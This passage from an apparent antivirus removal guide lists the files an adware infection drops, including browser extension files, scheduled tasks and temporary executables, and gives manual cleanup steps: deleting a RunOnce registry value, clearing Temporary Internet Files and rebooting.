    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\Kernel.js (46 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\es_419\messages.json (186 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\hr\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\manifest.json (2 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ro\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pt_PT\messages.json (161 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\main.css (673 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ro\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\el\messages.json (197 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\fr\messages.json (190 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\mr\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en_GB\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\am\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\mr\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ru\messages.json (262 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pl\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\arrow.png (332 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\icons\icon64.png (3 bytes)
    %Program Files%\thzXuJvjU\ZzB5QsG.dll (241 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sr\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\mk\messages.json (194 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\background.xul (463 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\icons\icon48.png (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\background.js (26 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ar\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\da\messages.json (153 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\files\main.css (672 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\et\messages.json (127 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\nl\messages.json (153 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\icons\icon19.png (815 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ca\messages.json (152 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\bg\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\pl\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sr\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\vi\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fa\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sq\messages.json (171 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\hu\messages.json (156 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\kn\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\lt\messages.json (149 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\background.png (109 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\files\background.js (16 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\no\messages.json (152 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\pt_PT\messages.json (161 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\en\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\pt_BR\messages.json (161 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\es\messages.json (186 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ml\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\bindings.css (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\fa\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sk\messages.json (143 bytes)
    C:\Windows\Tasks\uuxHwpnMkRCRpJh.job (274 bytes)
    C:\Windows\Tasks\bku3654992853611870.job (462 bytes)
    C:\Windows\Tasks\bku2343520322592297.job (468 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_334.exe (250065 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sdfCF40.exe (644 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\SilentInstaller_dotnet4[1].exe (150385 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amipixel.cfg (119 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\amipb[1].js (32188 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\index[1].htm (1133 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\InstallationConfiguration.xml (2242 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\installer.dat (667 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\po.db (1 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales (8 bytes)
    C:\Windows\System32\GroupPolicy\gpt.ini (268 bytes)
    C:\Windows\System32\GroupPolicy\Machine\Registry.pol (2 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
    "%original file name%.exe" = "c:\%original file name%.exe"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
